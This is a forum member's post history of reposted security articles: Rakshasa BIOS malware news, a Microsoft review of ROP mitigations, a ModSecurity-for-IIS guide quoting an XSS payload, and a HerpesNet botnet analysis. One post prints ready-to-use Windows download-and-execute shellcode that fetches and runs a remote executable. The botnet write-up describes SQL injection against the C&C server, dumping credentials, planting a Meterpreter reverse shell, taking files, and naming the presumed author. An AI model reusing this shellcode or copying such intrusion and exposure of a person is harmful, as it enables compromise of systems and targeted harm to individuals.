Posts: 18715 · Days Won: 701
Everything posted by Nytro
-
Let's not start that kind of discussion here too... I don't think I've ever seen a site against USL. The Internet is (still) ours, apolitical. PDL and USL, the same filth!
-
[h=1]Meet 'Rakshasa,' The Malware Infection Designed To Be Undetectable And Incurable[/h]

Via: Defcamp
Andy Greenberg, Forbes Staff
[h=6]7/26/2012 @ 12:50PM[/h]

Malicious software, like all software, gets smarter all the time. In recent years it’s learned to destroy physical infrastructure, install itself through Microsoft updates, and use human beings as physical “data mules,” for instance. But researcher Jonathan Brossard has innovated a uniquely nasty coding trick: a strain of malware that’s nearly impossible to disinfect.

At the Black Hat security conference in Las Vegas Thursday, Brossard plans to present a paper (PDF here) on “Rakshasa,” a piece of proof-of-concept malware that aims to be a “permanent backdoor” in a PC, one that’s very difficult to detect, and even harder to remove. Like some other tenacious malware strains, Rakshasa infects the computer’s BIOS, the part of a computer’s memory that boots its operating system and initializes other system components. But it also takes advantage of a potentially vulnerable aspect of traditional computer architecture: any peripheral, like a network card, CD-ROM, or sound card, can write to the computer’s RAM or to the small portions of memory allocated to any of the other peripherals. So Brossard has given Rakshasa, whose name comes from that of a mythological Indian demon, the ability to infect all of them. And if the BIOS or network card is disinfected, for instance, it can be reinfected from any one of the other compromised components.

In order to disinfect the computer, “you would need to flash all the devices simultaneously,” says Brossard, founder of the French security consultancy Toucan System. “It would be very difficult to do. The cost of recovery is probably higher than the cost of the laptop.
It’s probably best to just get rid of the computer.”

Rakshasa, which Brossard first suggested in a less-developed form at a Paris conference last spring, is built with open source, innocuous BIOS-modifying software like Coreboot and SeaBIOS. Brossard says that makes it compatible with more machines’ hardware than proprietary software would, and also means that antivirus isn’t likely to detect it. It’s programmed to download all the malicious code it uses after the machine boots up–and after antivirus is disabled–in the form of a fake PDF file over an SSL-encrypted Wifi connection, and then store that code in memory rather than on the hard drive, to avoid ever leaving a trace that might be caught by forensic analysis.

Just how Rakshasa would infect a computer in the first place isn’t exactly Brossard’s focus. He posits that a Chinese manufacturer might install it before it ever reaches a customer’s hands, a real problem given the complex supply chains in most computers’ past. “The whole point of this research is to undetectably and untraceably backdoor the hardware,” he says. “What this shows is that it’s basically not practical to secure a PC at all, due to legacy architecture. Because computers go through so many hands before they’re delivered to you, there’s a serious concern that anyone could backdoor the computer without your knowledge.”

A spokesperson for Intel, the company as close as any to being responsible for the architecture of modern PC hardware, says it’s reviewed Brossard’s paper and dismisses it as “largely theoretical,” writing that “there is no new vulnerability that would allow the landing of the bootkit on the system.” The company’s statement argues that it wouldn’t be possible to infect the most recent Intel-based machines, which require any changes to BIOS to be signed with a cryptographic code.
And it points out that Brossard’s paper “assumes the attacker has either physical access to the system with a flash programmer or administrative rights to the system to deliver the malware. In other words, the system is already compromised with root/administrative level access. If this level of access was previously obtained, a malicious attacker would already have complete control over the system even before the delivery of this bootkit.”

But Brossard argues that today only a small percentage of computers require code-signing in their BIOS. He admits that the attacker would need control of the computer before installing Rakshasa–not much comfort given his concern about manufacturers installing a piece of ultra-stealthy malware. And Intel’s claim that there is “no new vulnerability” exploited by Brossard’s work? He agrees. “It’s not a new vulnerability,” he says. “It’s a problem with the architecture that’s existed for 30 years. And that’s much worse.”

Check out Brossard’s paper, which contains many other nasty malware tricks, here or below.

Sursa: Meet 'Rakshasa,' The Malware Infection Designed To Be Undetectable And Incurable - Forbes
-
Download and Execute shellcode on Windows 7

Published by Bkav Editor at 4:59 pm under Security Research

Recently, I needed a shellcode to download and execute an .exe file on Windows 7 for my experiments. However, no such shellcode was available. The download-and-execute shellcode currently generated by the Metasploit Framework does not work on Windows 7, and searching the Internet did not bring desirable results. With reference to the shellcode by “SkyLined” and some other shellcodes from milw0rm.com, I wrote my own shellcode. This is the result I would like to share with you:

char shellcode[] =
"\xEB\x50\x31\xF6\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E"
"\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x67"
"\xE3\xEC\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99"
"\x02\x17\xC1\xCA\x04\xAE\x75\xF8\x3B\x54\x24\x04\xE0\xE4\x75\xCE"
"\x8B\x53\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C"
"\x97\xC3\x68\x8E\x48\x8B\x63\xE8\xA6\xFF\xFF\xFF\x66\xB8\x6C\x6C"
"\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD5\x68\x83"
"\x2B\x76\xF6\xE8\x8A\xFF\xFF\xFF\xEB\x21\x50\xFF\xD5\x68\xE7\xC4"
"\xCC\x69\xE8\x7B\xFF\xFF\xFF\x50\x4C\x4C\x4C\x4C\xFF\xD5\x68\x77"
"\xA6\x60\x2A\xE8\x6A\xFF\xFF\xFF\x50\xFF\xD5\x50\x68\x2E\x65\x78"
"\x65\x68\x43\x3A\x5C\x78\x50\x50\x89\xE3\x80\xC3\x08\x53\xE8\xC7"
"\xFF\xFF\xFF"
"http://website.com/file.exe";

As can be seen, the URL is placed at the end of the shellcode.

Download ASM source code

The shellcode was successfully tested on Windows 7, and it may also work on Windows 2000 and later versions.

Le Manh Tung
Senior Security Researcher

Sursa: http://blog.bkav.com/en/download-and-execute-shellcode-on-windows-7/
Other: http://grey-corner.blogspot.ro/2010/10/download-and-execute-script-shellcode.html
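A note on the layout above: the stub carries no pointer to the URL; it simply expects the NUL-terminated string to sit immediately after the last instruction, where position-independent code can find it. A minimal sketch, assuming nothing beyond what the post shows (the stub bytes are truncated here, and the URL is the same placeholder as in the post):

```python
# Hypothetical assembly of the final payload: position-independent stub
# first, then the NUL-terminated download URL appended at the very end.
stub = bytes.fromhex("EB5031F6648B76308B760C8B761C8B6E08")  # first bytes only

url = b"http://website.com/file.exe"    # placeholder, as in the post

payload = stub + url + b"\x00"          # the URL must be NUL-terminated

assert payload.startswith(b"\xEB\x50")  # stub begins with a short jmp (EB 50)
assert payload.endswith(b"file.exe\x00")
```

The same pattern (code, then trailing string) is what lets you swap in a different URL without reassembling the stub.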
-
What it does is modify "/proc/sys/kernel/randomize_va_space", using: sys_creat, sys_write, sys_close. But I don't know whether it will work: "/proc/sys/kernel/randomize_va_space: Permission denied".
-
Technical Analysis of the Top BlueHat Prize Submissions

swiat 26 Jul 2012 9:55 PM

Now that we have announced the winners of the first BlueHat Prize competition, we wanted to provide some technical details on the top entries and explain how we evaluated their submissions. Speaking on behalf of the judges, it was great to see people thinking creatively about defensive solutions to important security problems!

To set the stage for this post, we thought it would be helpful to quickly remind everyone of the problem that entrants needed to solve. Specifically, entrants were required to design a novel runtime mitigation technology capable of preventing the exploitation of memory safety vulnerabilities (such as buffer overruns). The BlueHat Prize judging panel was then responsible for evaluating each submission according to the following criteria (as described in the contest rules):

Practical and functional (30%)
Can the solution be deployed at large scale? Does the prototype have low overhead? Is the prototype free of any application compatibility or usability regressions? Does the prototype function as intended?

Robustness (30%)
How easy would it be to bypass the proposed solution?

Impact (40%)
Does the solution strongly address key open problems or significantly refine an existing approach? Would the solution strongly mitigate exploits above and beyond Microsoft’s current arsenal?

The judges for this contest consisted of representatives from Windows, Microsoft Research, and Microsoft’s Security Engineering Center (MSEC). Of the 20 entries received, the top three submissions described different methods of mitigating return oriented programming (ROP). Let’s dive into the technical details of these submissions.

[h=1]3rd place: mitigating ROP via return site whitelisting (/ROP)[/h]

This entry, as submitted by Jared DeMott, described a method of imposing a whitelist on the set of locations that a return instruction can transfer control to.
More specifically, this solution calls for the introduction of a new compiler flag (“/ROP”) that would add metadata to an executable describing the set of valid return sites in the image. When the image is loaded at runtime by the operating system, the image’s list is added to a master list. As the program executes, each invocation of a return instruction triggers an exception that causes the operating system to validate the target return site against the master list of return sites. If the target return site is in the list, the program continues executing as normal; otherwise, the program is safely terminated.

To prototype this idea, the submission included a Pin tool that simulated the hardware support that would be needed to augment the behavior of the return instruction. In addition, the prototype also included an IDA Python script to identify the set of valid return sites for an image. This script generated the input the Pin tool needed to check whether a return target was to be considered valid.

[h=2]Practical and functional[/h]

Although this solution is functional, it is not seen as practical for large scale deployment as described. The primary reason for this is the execution cost associated with implementing this check. This cost is expected to be significant because the design calls for a software interrupt to be raised for each return instruction. A second issue with this design relates to the data structure used to store the addresses of valid return sites. In particular, the prototype uses the STL map container which, although it enables O(log n) lookups, is not optimally compact and can therefore lead to considerable memory overhead depending on the number of valid return sites that exist in the modules loaded by a process. The design for this solution did not propose optimizations that could help address either of these concerns.

[h=2]Robustness[/h]

This solution is seen as a partial mitigation for ROP.
It could be bypassed by leveraging gadgets that are in the set of valid return sites, or by using a gadget chaining method that does not involve a return instruction. Finding a sufficient set of gadgets within the set of valid return sites is expected to be uncommon. The use of alternative chaining methods is feasible, although the complexity associated with doing so exceeds the current state of the art in ROP-based exploits seen in the wild.

[h=2]Impact[/h]

This solution would have a moderate impact if it were possible to deploy it at large scale. The fact that this solution does not fully address all forms of code re-use limits the expected long term impact of the design as described.

[h=1]2nd place: mitigating ROP by placing new checks in critical functions (ROPGuard)[/h]

This entry, as submitted by Ivan Fratric, described a method of mitigating ROP by introducing additional checks that are performed when critical functions, such as VirtualProtect, are called. These checks are designed to detect conditions that are indicative of ROP occurring, such as an API being called out of context. The checks proposed by this submission included:

1. Verifying that the stack pointer is within the bounds of the thread’s stack.
2. Verifying that the return address of a critical function is executable and preceded by a call.
3. Verifying that all stack frames are valid and satisfy criteria 1 and 2.
4. Simulating execution forward from a critical function’s return address to verify that subsequent returns satisfy criterion 2.
5. Function-specific contract changes (e.g. preventing the stack from being reprotected as executable).

Although adding checks to critical functions to detect ROP is not a new idea, and indeed some of the checks above have already been described in previous research, this submission included novel elements that we had not seen discussed before.
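The "return address preceded by a call" check above is easy to picture. A toy sketch, assuming a flat bytes buffer as "memory" and modeling only two common x86 CALL encodings (a real ROPGuard-style check must handle every CALL encoding and variable-length instructions):

```python
def preceded_by_call(mem, ret_addr):
    """Toy version of the 'preceded by a call' check: is the instruction
    just before ret_addr a CALL? Only two common encodings are modeled:
    E8 rel32 (5 bytes) and the 2-byte FF /2 register form (FF D0..D7)."""
    if ret_addr >= 5 and mem[ret_addr - 5] == 0xE8:          # call rel32
        return True
    if (ret_addr >= 2 and mem[ret_addr - 2] == 0xFF
            and (mem[ret_addr - 1] >> 3) & 7 == 2):          # call r/m32
        return True
    return False
```

A legitimate API call returns just after a CALL, so the check passes; a ROP gadget address usually follows an arbitrary instruction, so it fails.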
We actually received a number of submissions that proposed adding new checks to critical functions, but the other submissions covered a subset of the checks proposed by this submission or by previous research.

[h=2]Practical and functional[/h]

The checks proposed by this submission are considered to be both practical and functional. By limiting these checks to certain critical functions, the performance impact is minimized. Some of the proposed checks would be incompatible with certain applications. Specifically, check #1 is known to be incompatible with some legacy applications that do custom stack switching, and #3 is incompatible with x86 programs that enable frame pointer omission.

[h=2]Robustness[/h]

ROP mitigations that rely on introducing new checks to critical functions are not considered to be robust over the long term. The checks proposed by this submission and in previous research are capable of mitigating the ROP payloads that are used today, but it is expected that attackers would be able to adapt to these checks at relatively low cost. For example, a fundamental problem with this type of approach is that an attacker could attempt to call a lower level API that has not been instrumented with the checks. A variant of this bypass is to transfer control to a point after the instruction block that performs the checks (depending on how the checks have been added).

[h=2]Impact[/h]

This solution would have a moderate impact if implemented correctly and deployed at large scale. The fact that this solution does not fundamentally address ROP limits the expected long term impact of the design as described.

[h=1]1st place: mitigating ROP via Last Branch Recording (kBouncer)[/h]

This entry, as submitted by Vasilis Pappas, described a novel method of using the Last Branch Recording (LBR) feature of Intel processors to detect ROP when system calls are made. This method relies on a kernel component that allows branch recording to be enabled for return control transfers.
When a system call occurs, the kernel component enumerates each entry in the LBR stack and verifies that the destination address is preceded by a call instruction. The prototype for this solution relied on evaluating the contents of the LBR when certain critical APIs were called, rather than at the system call layer. The cited reason for this was Windows kernel restrictions around interposing on the system call layer in kernel mode.

[h=2]Practical and functional[/h]

This solution is considered to be both practical and functional. The use of supported hardware features to track the destination address of return control transfers helps drive down the performance cost and complexity of implementing this solution. There should also be minimal application compatibility impact with this approach.

[h=2]Robustness[/h]

This solution is not expected to be robust over the long term, although it should be robust against the ROP payloads that are used today. There are multiple reasons why. First and foremost, the Last Branch Recording feature of Intel processors has a limited stack for storing control transfers (16 entries on Nehalem and later). If an attacker can ensure that a sufficient number of valid returns happen between the control transfer that eventually leads to an API call and the point where the LBR stack is checked, then this solution can be bypassed. It is believed that attackers would be able to accomplish this in most cases at a low to moderate development cost. While it may be possible to use the Branch Trace Store (BTS) feature to help address this problem, the performance cost may become unacceptable. The other reasons this solution is not robust are shared with the two previous submissions: specifically, imposing these checks on specific APIs (as in the prototype) may be prone to bypasses, and imposing checks only on returns does not mitigate all methods of chaining gadgets.
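The LBR walk described above fits in a few lines. A hedged sketch (the names are mine; a real implementation reads MSRs in the kernel and disassembles the bytes before each destination, and the 16-entry limit is exactly what the bypass discussion exploits):

```python
LBR_DEPTH = 16   # LBR stack entries on Nehalem-class CPUs, per the write-up

def first_suspicious_return(lbr_records, call_preceded):
    """Toy model of the kBouncer check: at a checkpoint (system call or
    critical API), walk the recorded branches and flag the first return
    whose destination is not immediately preceded by a CALL.

    lbr_records  : iterable of (branch_type, dest_addr), most recent first
    call_preceded: predicate, True if a CALL instruction ends at dest_addr
    Returns the offending destination address, or None if all look clean.
    """
    for branch_type, dest in list(lbr_records)[:LBR_DEPTH]:
        if branch_type == "ret" and not call_preceded(dest):
            return dest   # looks like a ROP gadget return
    return None
```

Flooding the LBR with more than 16 legitimate returns before the checkpoint empties the window of evidence, which is the bypass the judges describe.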
[h=2]Impact[/h]

This solution would have a moderate impact if implemented correctly and deployed at large scale. The fact that this solution does not fundamentally address ROP limits the expected long term impact of the design as described.

[h=1]Closing thoughts[/h]

The winning submissions illustrate some of the creative thinking that has gone into developing defensive methods of making it more difficult and costly to exploit memory safety vulnerabilities. As we look toward the future, we will investigate whether there are elements of these methods that may make sense to integrate into EMET or a future version of our products. We have already taken steps in this direction by integrating features from the ROPGuard submission and related prior research into the Technical Preview of EMET 3.5.

As the judging criteria make clear, it can be quite challenging to turn an interesting defensive security idea into something that can be shipped in a retail product at large scale. Nevertheless, ideas that may seem impractical on the surface can eventually be turned into an innovative and practical solution – it just takes some additional focused thinking.

Matt Miller
MSEC Security Science

Sursa: Technical Analysis of the Top BlueHat Prize Submissions - Security Research & Defense - Site Home - TechNet Blogs
-
[h=3]Announcing the availability of ModSecurity extension for IIS[/h]

swiat 26 Jul 2012 10:44 AM

Vulnerabilities in on-line services, like cross-site scripting, cross-site request forgery, or even information disclosure, are important areas of focus for the Microsoft Security Response Center (MSRC). Over the last few years Microsoft has developed a number of tools capable of mitigating selected web-specific vulnerabilities (for example, UrlScan). To help on this front we have participated in a community effort to bring the popular open source module ModSecurity to the IIS platform. Yesterday at Black Hat Las Vegas we announced the availability of an RC version, and we expect that a stable release will be available soon.

[h=1]Installation[/h]

Although the source code of ModSecurity’s IIS components is fully published and the binary building process is publicly described (see mod_security/iis/winbuild/howto.txt in the SourceForge repository), it is strongly recommended not to build the module yourself except for research or development purposes. A standard MSI installer of ModSecurity for IIS 7 and later versions is available from the SourceForge files repository of the ModSecurity project, and in the future designated maintainers will keep it updated with the latest patches and minor versions of the module.

[h=1]Configuration[/h]

The IIS installer does not interfere with currently running web applications. This means that the installation process must be followed by an application pool restart or recycling in order to load the new module into the application pool process.
For the RC version of the module, the restart/recycle step is also highly recommended each time a ModSecurity configuration file has been changed. After a successful load of the module into the application pool process, a series of informational events is recorded in the application event log. Runtime messages and notifications generated during the operational phase, both from user-defined rules and from system-specific events or errors, are sent to the same application event log.

To apply a ModSecurity configuration file to a web application or a path, one has to use the IIS configuration schema extension, as in the example below:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <ModSecurity enabled="true" configFile="c:\inetpub\wwwroot\test.conf" />
  </system.webServer>
</configuration>

The c:\inetpub\wwwroot\test.conf config file is a regular ModSecurity configuration containing the same directives as used on the Apache web server.

[h=1]Examples of Protection[/h]

The most common application of ModSecurity is a protection layer called “virtual patching” (see Resources section, [5]). Using two recent vulnerabilities as examples, we would like to show how this layer can be specified in an environment with an IIS server running ModSecurity.

CVE-2011-3414

In December 2011 a vulnerability was addressed in ASP.NET that allowed attackers to cause excessive processor load on most ASP.NET web applications. The hash collision issue required the attacker to send a large (typically 1MB or 4MB) POST request to the server, with tens of thousands of arguments with specially crafted names. There are at least four ways to mitigate this kind of attack:

1. Restrict the request body size.
2. Restrict the number of arguments.
3. Identify repetitive payloads.
4. Check argument names against PoC data.
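Mitigation 3 (identify repetitive payloads) flags requests that carry a huge number of arguments whose first few values are all identical. A rough Python equivalent of that detection logic (the function name is mine; the thresholds mirror the rules: at least 1000 arguments, first four values equal):

```python
from urllib.parse import parse_qsl

def looks_like_hash_dos(body, min_args=1000):
    """Rough Python equivalent of the hash-DoS detection for CVE-2011-3414:
    deny when the body carries at least min_args arguments AND the first
    four argument values are all identical (a repetitive PoC payload)."""
    pairs = parse_qsl(body, keep_blank_values=True)
    if len(pairs) < min_args:
        return False
    first_values = [v for _, v in pairs[:4]]
    return len(first_values) == 4 and len(set(first_values)) == 1
```

Legitimate forms rarely combine both properties, which is why the two conditions are chained rather than used alone.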
The approach of checking for the presence of a repetitive payload is the most sophisticated one, and it can be implemented in ModSecurity using the following chain of rules:

SecRule &ARGS "@ge 1000" "chain,id:1234,phase:2,t:none,deny,msg:'Possible Hash DoS Attack Identified.',tag:'http://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true'"
SecRule REQUEST_BODY "^\w*?=(.*?)&\w*?=(.*?)&\w*?=(.*?)&\w*?=(.*?)&" "chain,capture"
SecRule TX:1 "@streq %{tx.2}" "chain,setvar:tx.hash_dos_match=+1"
SecRule TX:2 "@streq %{tx.3}" "chain,setvar:tx.hash_dos_match=+1"
SecRule TX:3 "@streq %{tx.4}" "chain,setvar:tx.hash_dos_match=+1"
SecRule TX:HASH_DOS_MATCH "@eq 3"

When this rule is loaded into an IIS server configuration and the attack is launched on the protected path, the Windows application event log records an access denied message from ModSecurity. At the same time the attacker sees HTTP response 403, stopping the attack before it reaches the vulnerable ASP.NET component.

CVE-2012-1859

In July 2012, Microsoft patched a classic case of a reflected cross-site scripting vulnerability in Microsoft SharePoint 2010. For an attack to exploit the vulnerability, it was enough to trick a user into clicking on a malicious URL, like the one below:

http://sharepoint/_layouts/scriptresx.ashx?culture=en-us&name=SP.JSGrid.Res&rev=laygpE0lqaosnkB4iqx6mA%3D%3D&sections=All<script>alert('Hacked!!!')</script>z

The script injected by the attacker could gain access to the entire data set available to the victim through the hacked SharePoint server. One possible way to block this attack is a whitelist approach: let URLs whose sections argument contains only valid characters pass through, while blocking all other URLs.
Below is a ModSecurity rule implementing this approach for alphanumeric characters:

SecRule REQUEST_FILENAME "@contains /_layouts/scriptresx.ashx" "chain,phase:1,block,msg:'SharePoint Sections Param Violation - Illegal Chars'"
SecRule ARGS:sections "!@rx ^\w+$"

The rule, included through a ModSecurity config file in the SharePoint web.config file, generates an event when any invalid character (indicating a possible attack attempt) is discovered in the corresponding SharePoint URL.

[h=1]Feedback[/h]

We encourage you to download and try out the tool. If you have any feedback on your experiences with the tool, you can reach us at switech@microsoft.com.

[h=1]Acknowledgments[/h]

The following people have contributed to the multi-platform effort of ModSecurity:

Microsoft – ModSecurity Port for IIS
Greg Wroblewski – Senior Security Developer
Suha Can – Security Researcher / Developer

Trustwave – ModSecurity
Ziv Mador – Director of Security Research
Ryan Barnett – Security Researcher Lead
Breno Pinto – ModSecurity Researcher & Developer

Open community – Security Port for Nginx
Alan Silva – Software Engineer at Alcatel-Lucent

We would like to thank Wade Hilmo and Nazim Lala, members of Microsoft’s IIS team, for their support and help in solving many technical problems.

[h=1]Resources[/h]

[1] ModSecurity home page: http://www.modsecurity.org/
[2] OWASP Core Rule Set for ModSecurity: https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
[3] http://blog.modsecurity.org/files/enough_with_default_allow_r1_draft.pdf
[4] http://www.modsecurity.org/documentation/Securing_Web_Services_with_ModSecurity_2.0.pdf
[5] https://www.blackhat.com/presentations/bh-dc-09/Barnett/BlackHat-DC-09-Barnett-WAF-Patching-Challenge-Whitepaper.pdf

- Greg Wroblewski, Microsoft Security Engineering Center
- Ryan Barnett, Trustwave

Sursa: Announcing the availability of ModSecurity extension for IIS - Security Research & Defense - Site Home - TechNet Blogs
-
[h=2]Apple is still a whore.[/h]

Published on July 26, 2012 by Razvan in Stiri

And I'm right when I say that. As you know, Apple and Samsung are fighting a patent war all over the globe; all that's left is for them to go to court in Romania too. So that everyone understands: Apple uses Samsung patents and Samsung uses Apple patents. Except that Apple, whore that it is, decided to raise the amount the South Korean company has to pay per product from $2.09 to $24. This after telling Samsung that their patents are worth nothing, offering them $0.0049 per patent. That is, if Apple sells 30 million phones this year, Samsung would earn only $147,000, while on the other hand it would have to pay Apple a few billion dollars. Seems fair, right? I understand the English judge humiliated them in the most disgusting way possible, but to react out of desperation and in such an underhanded way is the lowest level possible. If until now I only had a problem with the high price of Apple products, given what they can do, now I am disgusted by this company and its methods.

Sursa: Apple tot o curva ramane.
-
I fixed the members list: https://rstcenter.com/forum/memberlist.rst Come on, it hadn't been broken for that long... Edit: The calendar now works through 2015 too; nice job there, vBulletin...
-
[h=1]Analysis & pownage of herpesnet botnet[/h]

Analysis & pownage of herpesnet botnet

Introduction
Tools
Static analysis
C&C contact
Pown the C&C
Pown the C&C - part 2
C&C interface
Botnet owner tracing

[h=2]Introduction[/h]

We received a new sample through our submission mechanism. This sample is an HTTP botnet client called HerpesNet. The md5 of the sample is db6779d497cb5e22697106e26eebfaa8. We started the analysis, and then we found a way to take over the command & control...

[h=2]Tools[/h]

IDA 5.0 free. The IDB of the file is available (db6779d497cb5e22697106e26eebfaa8.idb).
sqlmap.
your favorite browser.

[h=2]Static analysis[/h]

We start by opening the binary with IDA. We see immediately that the file is not packed. We follow the Win_Main function, and at offset 004071E0h we can see a call to 004070E0h (initThread).

The initThread function is in charge of decoding strings, opening a mutex with the name "rffggghooo" and running 3 threads:

004034F5h (thrInstallReg), with the parameter at offset 0041CE88h ("tcerfhygy"), loops indefinitely and sets the regkey 'Software\Microsoft\Windows\CurrentVersion\Run' with the name "rffggghooo" to enable boot persistence (it does that every 100 ms).
00402F70h (thrKeylogger) is in charge of logging keystrokes with the help of GetAsyncKeyState.
00406AF0h (thrContactCC) is in charge of loading system information and checking in with the C&C every 15 s.

[h=3]Decode strings[/h]

00406FC0h (initVariable) is in charge of decoding all obfuscated strings; 00403034h (decode) decodes a single string. We wrote a Python script to recover all the strings:

#!/usr/bin/env python
import sys

def decode(src):
    r = ""
    for c in src:
        c = ord(c)
        if c < 0x61 or c > 0x7a:
            if c < 0x41 or c > 0x5a:
                r += chr(c)
                continue
            x = ((c - 0x41) % 0x1a) + 0x41
        else:
            x = ((c - 0x54) % 0x1a) + 0x61
        r += chr(x)
    return r

def main():
    if len(sys.argv) != 2:
        sys.exit(1)
    f = open(sys.argv[1], 'rb')
    f.seek(0x1ae88, 0)
    data = f.read(0x32f)
    for d in data.split("\0"):
        if len(d) == 0:
            continue
        print "%s : %s" % (d, decode(d))

if __name__ == "__main__":
    main()

y0ug@malware.lu:~/malware/herpes$ python decode-all.py db6779d497cb5e22697106e26eebfaa8
tcerfhygy : gpresultl
3.0 : 3.0
uggc://qq.mrebkpbqr.arg/urecarg/ : http://dd.zeroxcode.net/herpnet/
74978o6rpp6p19836n17n3p2pq0840o0 : 74978b6ecc6c19836a17a3c2cd0840b0
uggc://jjj.mrebkpbqr.arg/urecarg/ : http://www.zeroxcode.net/herpnet/
sgc.mrebkpbqr.arg : ftp.zeroxcode.net
uggc://sex7.zvar.ah/urecarg/ : http://frk7.mine.nu/herpnet/
hcybnq@mrebkpbqr.arg : upload@zeroxcode.net
hccvg : uppit
ujsdsdbbngfgjhhuugfgfujd : hwfqfqooatstwuuhhtstshwq
rffggghooo : esstttubbb
Ashfurncsmx : Afusheapfzk

[h=2]C&C contact[/h]

The function in charge of building the request for the C&C check-in is 004059E0h (buildRerqd). It builds the POST data from the information gathered above into something like this:

userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0&raminfo=256&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none&vidinfo=none&laninf=none&id=23724

After that it builds the URL, appending "run.php" to the end of the URL passed as parameter. 00403E57h is in charge of making the HTTP request. Along the way it sets the user agent to 74978b6ecc6c19836a17a3c2cd0840b0 (the deobfuscated value). After the request is made, it calls 00405F80h (parseCommand), which executes the commands received from the C&C (we are not going to detail the commands here; you can look directly in the IDB).

Another interesting function is 0040391Fh (fileUpload), which uploads files via POST using the variable name "upfile"; it can be driven directly with curl:

y0ug@malware.lu:~/malware/herpes$ curl -F upfile=@test.jpg -A 74978b6ecc6c19836a17a3c2cd0840b0 zeroxcode.net
File caricato correttamente

("File caricato correttamente" is Italian for "file uploaded successfully".)

[h=2]Pown the C&C[/h]

We were curious about how the C&C was coded, so we decided to test some SQL injection on the C&C API, especially on zeroxcode.net. With sqlmap we managed to exploit a time-based SQLi.
Place: POST
Parameter: id
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: userandpc=foo&admin=1&os=WindowsXP&hwid=2&ownerid=12345&version=3.0&raminfo=256&cpuinfo=p1&hdiskinfo=12GO&uptime=3600&mining=0&pinfo=none&vidinfo=none&laninf=none&id=23724' AND SLEEP(5) AND 'PtaQ'='PtaQ
---
[08:22:41] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.3.10
back-end DBMS: MySQL 5.0.11

We extracted the table names from the database:

Database: herpnet
[7 tables]
+----------+
| clients  |
| clinfo   |
| commands |
| htickets |
| husers   |
| paypalt  |
| uploads  |
+----------+

And ta-da, we get the user credentials of the malware author:

+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | Frk7     | 6e6bc4e49dd477ebc98ef4046c067b5f |
+----+----------+----------------------------------+

With Google we recover the password: 6e6bc4e49dd477ebc98ef4046c067b5f:ciao. That is a master criminal genius of a password.

We also found a path disclosure that can be triggered with curl, for example:

y0ug@malware.lu:~/malware/herpes$ curl zeroxcode.net
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL C:\inetpub\zeroxcode\herpnet\run.php/ was not found on this server.</p>
<hr>
<address> Server at zeroxcode.net Port 80</address>
</body></html>

[h=2]Pown the C&C - part 2[/h]

We saw that the developer uses a machine called Frk7Test@FRK7TEST-D6E0BD. So we uploaded a meterpreter to get a shell on the machine (using the upload feature provided by Frk7 himself).

msf exploit(handler) > exploit

[*] Started reverse handler on 94.21.200.63:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 151.63.47.177 [*] Meterpreter session 1 opened (94.21.200.63:4444 -> 151.63.47.177:53574) at Mon May 21 16:20:04 +0200 2012 meterpreter > screenshot Screenshot saved to: /home/y0ug/src/msf3/PtPVDrKD.jpeg meterpreter > sysinfo System Language : it_IT OS : Windows XP (Build 2600, Service Pack3). Computer : FRK7TEST-D6E0BD Architecture : x86 Meterpreter : x86/win32 meterpreter > meterpreter > ls Listing: C:\Documents and Settings\Frk7Test\Desktop\Herpes4Un ============================================================= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 40777/rwxrwxrwx 0 dir Mon May 21 15:26:37 +0200 2012 . 40777/rwxrwxrwx 0 dir Mon May 21 15:37:07 +0200 2012 .. 40777/rwxrwxrwx 0 dir Mon May 21 14:53:32 +0200 2012 Debug 40777/rwxrwxrwx 0 dir Mon May 21 16:06:41 +0200 2012 Herpes 100666/rw-rw-rw- 890 fil Mon May 07 20:42:22 +0200 2012 Herpes.sln 100666/rw-rw-rw- 167424 fil Mon May 21 16:14:06 +0200 2012 Herpes.suo 40777/rwxrwxrwx 0 dir Mon May 21 16:15:12 +0200 2012 Release 100777/rwxrwxrwx 134 fil Mon May 07 20:42:12 +0200 2012 clean.bat 100666/rw-rw-rw- 134 fil Mon May 07 20:42:22 +0200 2012 roba da fare.txt meterpreter > download -r Herpes ./ [*] downloading: Herpes\antidebug.h -> .//antidebug.h [*] downloaded : Herpes\antidebug.h -> .//antidebug.h [*] mirroring : Herpes\base64 -> .//base64 [*] downloading: Herpes\base64\base64.c -> .//base64/base64.c [*] downloaded : Herpes\base64\base64.c -> .//base64/base64.c [*] downloading: Herpes\base64\base64.h -> .//base64/base64.h [*] downloaded : Herpes\base64\base64.h -> .//base64/base64.h [*] mirrored : Herpes\base64 -> .//base64 [*] mirroring : Herpes\cadt -> .//cadt [*] downloading: Herpes\cadt\cadtdll.lib -> .//cadt/cadtdll.lib [*] downloaded : Herpes\cadt\cadtdll.lib -> .//cadt/cadtdll.lib [*] downloading: Herpes\cadt\cadtlib.h -> .//cadt/cadtlib.h [*] downloaded : Herpes\cadt\cadtlib.h -> .//cadt/cadtlib.h ... 
The files we were able to download before frk7 shut down his machine (and web site) are here.

And a screenshot of the machine:

[h=2]C&C interface[/h]
First, the login page:
Secondly, the panel page (logged in with the frk7 account - see top-left):
The tasks page:
The list of available commands:
Information about an infected machine (in this case frk7's own test machine - yes, we see you!!)

[h=2]Botnet owner tracing[/h]
We did some research to find out who manages this botnet.
First, his pseudonym: frk7 or siliceous
Secondly, his real name: Francesco Pompo
